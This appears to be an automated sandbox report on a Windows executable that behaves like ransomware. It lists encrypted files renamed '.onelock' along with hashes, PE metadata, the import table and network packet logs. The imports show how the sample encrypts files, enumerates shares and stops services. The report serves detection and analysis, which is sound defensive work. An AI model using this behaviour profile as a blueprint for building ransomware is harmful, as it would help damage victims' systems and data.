                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....&n..p...1.a.X...9b...^....n..o.@L..E.P.We....B.1:S..^.Q.a.q.(..3z.ff^...5..^1.7;h.Y...G@.6.\Us.W......5:.>.b...k..2.Kj([..O......:V.{....}-........`E....6.....}in*C..O..rU..B.7.H5[.s}..#v......]t..=>=B!.G_,{..1@m......".......C.fn..lY....t.js.(@.....v<r..q..MdM..g..nN2. .Yu~O.C...5.5n.Q....t....&.....:n...be..........l..~h(.T+.(.6by6*^u...bC.......6..&.....Vn.W....&..DNDd)...7t...Z.oX.7@.].+ZN.*..y|..M0`..y.k.2.....P....5l.UWV.5....nS...u..1V..&...<.1z8T./o...h..Z..t....Z...^....<.............,G.?....?$....,(.......@.....~. ..[\...j..U.....$.........:G..!m.sU.aQUE..6.t......\...?.....w".u.SL...#.lz....=.}|u~..bP.@HM..&s..j...T9VP...1o..=....3.c\+.&....f...gA.?..V>.I......H........?_Y..T.OD&......+.-M.)D....'U7.../..<....&V..TK

                                    Y:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.995827959658683
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:04B285DD28D761E09E245EE6217054A5
                                    SHA1:3D1243C6D0EA819676AEB8BBFE17456237611AB0
                                    SHA-256:E9F361121CD01573F390394154D9A56E9EE1E3E2C2C5F6EADEB944AD77AAC9DC
                                    SHA-512:DD3A8B3B4E179BCF6597072F9CBFB9AA848C41657712C5B630AB7E7CBDB0B2839E8A98956E1A10B859B17294D0443D5A00E6EB35F5EE81AC8EBB83B91059DE67
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..9"....;..>.M.s*..E.j.f..P..e].o,}..F..:..6.{.n......V.y..dl..0...Q...\k_.?..vA.tb....'.r.dM..k.D..i....h..c...*.7..8....9..E.z...h...K.#Q.o...3..e.8.I.....>.1./...C@..$..[.y....HF..Ac..)..b..4..l].AN..HIC.ou?..j.`.x.W..........9.3.!.&..c.k.....[L..i46O.)E>...|..........9u...'.H...I.G....d...V.@M.."=.r.k..d..>.L...eyJ.8Sf.../.\~;(......dc.a'.R..).e.....#...y`..y.2uE=..Z*..pPz..L......sSv6...m^.M..=LE...<O.I..w.J.Z../.2.O..?.C...i....].O/^$.^...6.j......P1#...p..............X.*.ko@.5..F#p~...^s#...T7Ga8.H"......mG*G@.`..3JN......B.qR.N!..g..f.<..... .7.&.a.<]..LN...*....Xq...N.......W.I.I.-.x.....3.].O...X..u8..3]:..W.......(..f.ed.../h...E..Z&.ne.D.*....0.....L.M..)..v.u18&3|...a,..]C...~...1_...-.Q..j...K.0;8}._E....H?...k...u.../..

                                    Z:\Recovery\WindowsRE\ReAgent.xml.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.975821602327213
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DEE9144F23E2ADC461C4F884D76F3D9E
                                    SHA1:2CEF7363EB4936FEBC8722AD655477EC56455E53
                                    SHA-256:5F195EC629E3D957FD28DBC8FC2DDBBB55550505F5B78C2893966946EC1B1EE3
                                    SHA-512:30E7766A7C811A890FCA56CB9D526730E122CFDACA251607974CA938505EE6E4567D8FF40FC24058D6B0DB96A54392E976A06F4D6C8632060D69CF53BD2C527C
                                    Malicious:false
                                    Preview:.pi..2S.s^R.P\..mR....Y...=F\.d.7../...g...C*|\.iY9a$....~^. ...9..j..bI..g....\~I..../w...G.e.c)....a..+f..D.}..-PI...NJ .K<L.t.....U...1.V2u..(1R.......D.....KB..jo..n.U.F....9t..@......8...^.....#.A......;x.E...H......9\$.&.W..,.....E|RF.e+.,y..:f........db..A.x...*...y*.|...3W......=.}.d..J..5..yk. O.p>...E...6.Bp0HL......(...?8....Q..c...g.9]...j&..N.(.rS..O......r..v...E...Q1~....kX.~_....K..g.{....>(.y?rC"..[|..?{.2.B..9n.0.f.--......G...M.......T.IN.k...s.r(9...FH..a....F....2.>.9J6.6..(.Y#l.....IO..g.sZ.`.['..h..7..=...H....V.nc.Z..1.....)!.{.J.....5.N.O.m...ug..C..v. :^<X....%f..$0.91......S..H."Vm....]ae...].)....-f......L...%..j....e....FQ(( ..L..........=..d7>[.M.NY.....7.!..6.vHM.,..^.3.u...P..lm......X1.ks........)....PM..7......U...........k.......gPE-Sg........Y.............3......fu.^.(......._.1.-.T..@.6..3.p'.6./....J+.kz.V.......i-.....G....V....`.n. G..+.kU..$C...."..$..%[.K~...j|.Sm.....~..q..-...EwR?'.|..

                                    Z:\Recovery\WindowsRE\Winre.wim.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:DOS executable (COM)
                                    Category:dropped
                                    Size (bytes):367239878
                                    Entropy (8bit):7.999581729841427
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:EA4FC44AA0DD9A4413B59910823A6EF3
                                    SHA1:61A52D24BC41BAF79D32D14F2B7F3208FA7BF90A
                                    SHA-256:129A789830A786AFD7AD369CA768E090691F3FFC5F27E99EDDB13760769ED4DB
                                    SHA-512:ADE0A08B84129DF38AD8F8D016DA2433347988DCED5C7214CC5BAF5DF6128EC1373670EB69716DF993B5C8081F42B881618D8D50479A0C8ABBA2A3F49E06746D
                                    Malicious:true
                                    Preview:...xw..B.._. ...o.1........}...8.q...!.}~,....:x&u....&....<Dp.V..Gd..I.X..1'q.<z.........ZY.v.$.y.r.._..p...L.1.O..8.......W...{I)..4J......ve..dCC|3J..:s.q.'.`.f..<..<N4.Iz!...{..g.P.,.N.......~.......`./S%..G..y.z.....g.|}.*......$$..q...~."....l........t..2'.75)..[....p.hE.....;s...??......q.a.....:......C.)4...OTOt..Ox5.S.x....v]3^...).]....X..+..&...0o...)..o..C.L..)....n{.....*..3{......[.>.../4.F.3.....xm[.........-.K.vu..x.j.S."=6...SC[sP..].x,i..J..O....... /.HB.........Z ..G.T.{b#8.W....$.....@K..3-Wg~.]..\b.Dr-8.yg....#I.......|M.e.4mNF.E.p....+.:...kX....w..P..l/.8../4........#...x.H4VrW.i.....j.a]...+....!.6.=.).$.:.2E.1.Z...h..b.g}PO........Z0.t.\.7(1....X..M.+............].sBz.m.@.V..`..&......@.b.4o.V:.<.......r.gz..N..s...`..M..*Z..Q. .3=.w.Q.Kj..x.A.."[.'..d...:.#.<.`A.1..\D.O.l.....7'..v.Jkk..||...d...}D..P3<l@J.o...H....VmY......z>.%...!..w..4...~(;.Gg'J.Y..g.....tW...B.._^......H.F...W..+$..}{.S.< M.0

                                    Z:\Recovery\WindowsRE\boot.sdi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3170840
                                    Entropy (8bit):7.999931844895833
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:31230714AD686244A1E1692A96599057
                                    SHA1:8578AEA64F22DAC0B9801F71B1C19EE138D6CB6F
                                    SHA-256:8D01CFF40ABE924D6022A371040C0970297A6A2B50B6138EDA2900A2FC7D068B
                                    SHA-512:EED2B1AEA32A4FAF480526BDC7559951CC44408B521C71020E02EBD02D534A359F985F3D2203EDCCD4035B5CD046B530B9058EBED1B5D84ADBA2D3D2CE7F38B6
                                    Malicious:true
                                    Preview:.m.....x.IO..Oi?.-.$./.Y6.X....O.c|U...)...K.#M..........:$xP.sP ..UR..5?0.i3.s.HcZ5G.'.....>.0+....x.lptsa....\..\.V1].ZT.".h.A..o..F.#...Db...*r..f&..D.........m..C..#..>.w..6..y..F+..a....g.O8.9._..(....z.[..`.&....v3...26.>...u..{D..\y2..'Z...C.].....^h.....R.i..9,p.?..q...g..:.)-"9D.U..4.w..GA...S.c.R....MK.[....Y.8.....g...3.I.o.b...|8........j.|...B2...z....n. .w,Z..L//.}.:..d`.....-...v"...D;N.f.t+.y.pz....t.`...#*{.9k.v.."K.....i....S'SA}..}..#..5..yT...@...rS.'.|..P..l%....SJ.I}..@&......mK....../.).L....1.\.}...I....4..oA0M.`m..+h...GC..\.~.Z..l}.....<.{..H...-. (...eN(.X.%.I....:...U..J...*...x........f9..)E....^.....M...r../....rv......$:ho...p<..P.......;.y4..u...>.u...w%.a.....}Amo.[[.?....f.V.z.}.T\.....|.....>'...~..cT.{3|...U..)`..so%...t8..~*N.h.C....K.h.|..Q.8.H.}...A*.A.........m.}.,)....:..).....L.X....v4.l.....c.K<..]......'*...7_...k.....hP.l'........:.{S.V.?..3....U.H....S..,.t@..v.~....8.9Dy.....m..fgF.J......|...

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    File Type:ASCII text, with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):35
                                    Entropy (8bit):3.9975790033896286
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:AF404CF1944BF737356BF00A2EC9121D
                                    SHA1:2F1867B11BAA22A86BEFFE8147714E9805B2A58F
                                    SHA-256:2D46C542862CB3FC9F22BB3EB29E1EFE31AA02B438A40D62485470981F58CBD3
                                    SHA-512:F5B178BAFB0D8DD0833AC1830079B097FD37F32DEE617F0F4A3D6ECEA54B7E6FC9DA281D60A56A6FFB4D1ABA9AD76E643133CA23087DE8BED6593E4B5C1ED4E8
                                    Malicious:false
                                    Preview:Unexpected switch at this level....

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.189424744316123
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:98j0BL6iLT.exe
                                    File size:685568
                                    MD5:646698572afbbf24f50ec5681feb2db7
                                    SHA1:70530bc23bad38e6aee66cbb2c2f58a96a18fb79
                                    SHA256:26af2222204fca27c0fdabf9eefbfdb638a8a9322b297119f85cce3c708090f0
                                    SHA512:89bad552a3c0d8b28550957872561d03bf239d2708d616f21cbf22e58ae749542b07eee00fedac6fdb83c5969f50ea0f56fc103264a164671a94e156f73f160a
                                    SSDEEP:12288:dQA0FfTcwpBuV2UxqDmuiLZeUaoFi2XZWfGe615HhAZV8D4KD/KeX:Tuf4wTuV2Ux3uIZeUBi2Te6HWdKrKe
                                    TLSH:39E49D1035818132EAB301718EBDA66D517DF9220B2A58DBA3CC656D4F7D9F27E32237
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..CP..CP..CP...8..RP...8...P...8..TP...8..BP...;..[P...;...P...;..gP...8..TP..CP...P..u<..NP..u<..BP..u<..BP..RichCP.........

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x43a327
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5DBA7A68 [Thu Oct 31 06:08:40 2019 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:1a395bd10b20c116b11c2db5ee44c225

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F13E8C64926h
                                    jmp 00007F13E8C63FAFh
                                    mov ecx, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    xor ecx, ebp
                                    call 00007F13E8C6381Ah
                                    jmp 00007F13E8C64110h
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                    lea eax, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-10h], eax
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                    lea eax, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-10h], esp
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9db780xf0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x1e0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000x5a7c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x953a00x38.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x9547c0x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x953d80x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x740000x320.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x72bb60x72c00False0.49082584422657954data6.544529739311217IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x740000x2adb20x2ae00False0.2693888939504373data3.688258682048505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x9f0000x4b680x3a00False0.18561422413793102data4.779034224413307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xa40000x1e00x200False0.52734375data4.7082365148683625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xa50000x5a7c0x5c00False0.6774796195652174data6.5688213936338835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_MANIFEST0xa40600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                    Imports

                                    DLLImport
                                    KERNEL32.dllProcess32NextW, Process32FirstW, CreateProcessW, GetTickCount, CopyFileW, GetCurrentProcess, WriteConsoleW, CreateToolhelp32Snapshot, OpenProcess, WaitForSingleObject, TerminateProcess, FindClose, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindVolumeClose, SetVolumeMountPointW, FindFirstVolumeW, QueryDosDeviceW, GetEnvironmentVariableW, GetLogicalDrives, GetProcessHeap, MoveFileExW, SetFilePointerEx, HeapAlloc, CloseHandle, GetLastError, SetFileAttributesW, GetFileAttributesW, CreateFileW, WriteFile, HeapSize, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, HeapReAlloc, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, HeapFree, GetFileSizeEx, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetStdHandle, ReadFile, OpenMutexW, Sleep, CreateMutexW, GetModuleFileNameW, SetEnvironmentVariableW, EncodePointer, DecodePointer, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, QueueUserWorkItem, GetModuleHandleExW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, QueryPerformanceFrequency, FormatMessageW, WideCharToMultiByte, MultiByteToWideChar, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, WaitForSingleObjectEx, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, SetEvent, ResetEvent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, LocalFree, CreateTimerQueue, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetCurrentThread, GetThreadTimes, FreeLibrary, FreeLibraryAndExitThread, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, RtlUnwind, ExitProcess
                                    ADVAPI32.dllCryptExportKey, RegCreateKeyW, RegOpenKeyExW, RegSetValueExW, RegCloseKey, CryptReleaseContext, CryptGenKey, CryptImportKey, OpenProcessToken, GetTokenInformation, CloseServiceHandle, OpenSCManagerW, DeleteService, ControlService, EnumDependentServicesW, OpenServiceW, QueryServiceStatusEx, CryptDestroyKey, CryptAcquireContextW, CryptEncrypt, CryptDuplicateKey, RegDeleteValueW
                                    SHELL32.dllSHEmptyRecycleBinW
                                    ole32.dllCLSIDFromString, IIDFromString, CoInitializeEx, CoGetObject, CoInitialize, CoUninitialize, CoCreateInstance, CoInitializeSecurity
                                    OLEAUT32.dllSysAllocStringByteLen, VariantClear, SysAllocString, SysStringByteLen, VariantInit, SysFreeString
                                    CRYPT32.dllCryptStringToBinaryA
                                    MPR.dllWNetGetConnectionW
                                    NETAPI32.dllNetApiBufferFree, NetShareEnum
                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, GetAdaptersInfo, IcmpCreateFile
                                    WS2_32.dllinet_addr
                                    RstrtMgr.DLLRmShutdown, RmRegisterResources, RmStartSession, RmGetList, RmEndSession

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 25, 2023 19:45:01.757654905 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.757733107 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.757910967 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.758075953 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.758095980 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.833183050 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.833404064 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.833856106 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.833869934 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.837990046 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838011026 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838083982 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838105917 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838135958 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838150978 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838233948 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838253975 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838295937 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838295937 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838316917 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838351965 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838373899 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838391066 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838520050 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838548899 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.838668108 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.838840961 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.839531898 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.969758034 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.969893932 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.969918966 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.969983101 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.970001936 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.970053911 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.970112085 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.970112085 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:01.970135927 CET44349681204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:01.972906113 CET49681443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.028167963 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.028223991 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.028315067 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.041049957 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.041086912 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.104320049 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.106214046 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.110863924 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.110882998 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.111867905 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.111886024 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.111932039 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.111958981 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.115044117 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.115087986 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.122740984 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.122795105 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.138309002 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.138370991 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.220849991 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.221035004 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.232748985 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.243196011 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.243238926 CET44349682204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:07.243254900 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:07.244247913 CET49682443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:10.014550924 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.014620066 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.015139103 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.016144991 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.016172886 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.083646059 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.090101004 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.094341993 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.094362974 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.094861984 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.118664980 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.118767023 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.138637066 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.138848066 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.140302896 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147821903 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147821903 CET49683443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.147864103 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.147891045 CET4434968323.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.183087111 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183147907 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.183239937 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183417082 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.183446884 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.249989033 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.262702942 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.262731075 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.263421059 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.263439894 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.284995079 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.285144091 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.292181969 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293242931 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293242931 CET49684443192.168.2.323.35.236.109
                                    Jan 25, 2023 19:45:10.293282986 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:10.293298006 CET4434968423.35.236.109192.168.2.3
                                    Jan 25, 2023 19:45:12.274605036 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.274682999 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.274810076 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.275628090 CET49685443192.168.2.3204.79.197.200
